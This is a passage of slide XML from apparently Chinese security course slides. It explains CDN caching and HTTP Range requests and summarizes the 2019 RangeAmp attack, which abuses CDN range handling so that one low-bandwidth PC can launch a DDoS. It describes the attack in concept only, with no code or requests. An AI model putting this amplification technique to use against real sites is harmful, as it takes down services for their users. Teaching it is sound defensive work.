            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>然而通过一些漏洞，可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>攻击，从而破坏原有系统的可用性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>RangeAmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>攻击：一台电脑便可让世界上最流行的网站瘫痪 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2019 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年，清华</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>奇安信安全联合研究中心的研究人员发现了一种全新的利用互联网通用协议未知缺陷的攻击。这种新型方式被命名为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>RangeAmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，攻击者可利用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设计缺陷以及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通用实现缺陷对任意部署 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务的站点进行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击的场景。攻击者无需控制僵尸网络，仅通过较低配置的个人电脑、低带宽网络就可以发起大规模 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDoS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击，使对应的网站拒绝服务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2269877-799F-A84A-874B-0910CD5BC59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893725" y="1485528"/>
            <a:ext cx="4872890" cy="1515366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFF4B1BF-AD57-3645-9C85-5291638BFC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4365" y="3227590"/>
            <a:ext cx="6681504" cy="2807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6266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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缓存：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当服务接入了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之后，浏览器本地缓存的资源过期之后，浏览器不是直接向源服务器请求资源，而是转而向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点请求资源。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点中将用户的数据缓存起来，如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的缓存也过期了，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点会向源服务器发出回源请求，从而来获取最新资源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范围请求）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议范围请求允许服务器只发送 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消息的一部分到客户端。范围请求在传送大的媒体文件，或者与文件下载的断点续传功能搭配使用时非常有用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2269877-799F-A84A-874B-0910CD5BC59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5893725" y="1485528"/>
            <a:ext cx="4872890" cy="1515366"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFF4B1BF-AD57-3645-9C85-5291638BFC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4365" y="3227590"/>
            <a:ext cx="6681504" cy="2807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88043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2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CDN</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71946" y="1402259"/>
            <a:ext cx="4622419" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>缓存：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当服务接入了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之后，浏览器本地缓存的资源过期之后，浏览器不是直接向源服务器请求资源，而是转而向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点请求资源。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点中将用户的数据缓存起来，如果 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的缓存也过期了，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>边缘节点会向源服务器发出回源请求，从而来获取最新资源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP Range</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>范围请求）：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>协议范围请求允许服务器只发送 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>消息的一部分到客户端。范围请求在传送大的媒体文件，或者与文件下载的断点续传功能搭配使用时非常有用。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9340AF62-FDA5-4579-A77C-2735B1678E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568901" y="1677331"/>
            <a:ext cx="7084034" cy="1554007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B8373C8-5E1A-4221-922E-50FEA265A523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568901" y="3429000"/>
            <a:ext cx="6634556" cy="3738417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4108626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0" y="-2454"/>
            <a:ext cx="3695700" cy="68580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Light"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22541" name="文本框 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="177800" y="4243470"/>
            <a:ext cx="33401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Nexa Light" panose="02000000000000000000" pitchFamily="50" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Nexa Light" panose="02000000000000000000" pitchFamily="50" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Nexa Light" panose="02000000000000000000" pitchFamily="50" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Nexa Light" panose="02000000000000000000" pitchFamily="50" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Nexa Light" panose="02000000000000000000" pitchFamily="50" charset="0"/>
                <a:ea typeface="微软雅黑"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pitchFamily="34" charset="-122"/>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srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>总目录 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> CONTENTS</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997171" y="1711325"/>
            <a:ext cx="3374642"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00" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第一篇  基础理论篇 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="100" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="微软雅黑 Light"/>
              <a:ea typeface="微软雅黑 Light"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6997171" y="2499448"/>
            <a:ext cx="3268844"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00" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="微软雅黑 Light"/>
                <a:ea typeface="微软雅黑 Light"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二篇  数据安全篇</a:t>
            </a:r>
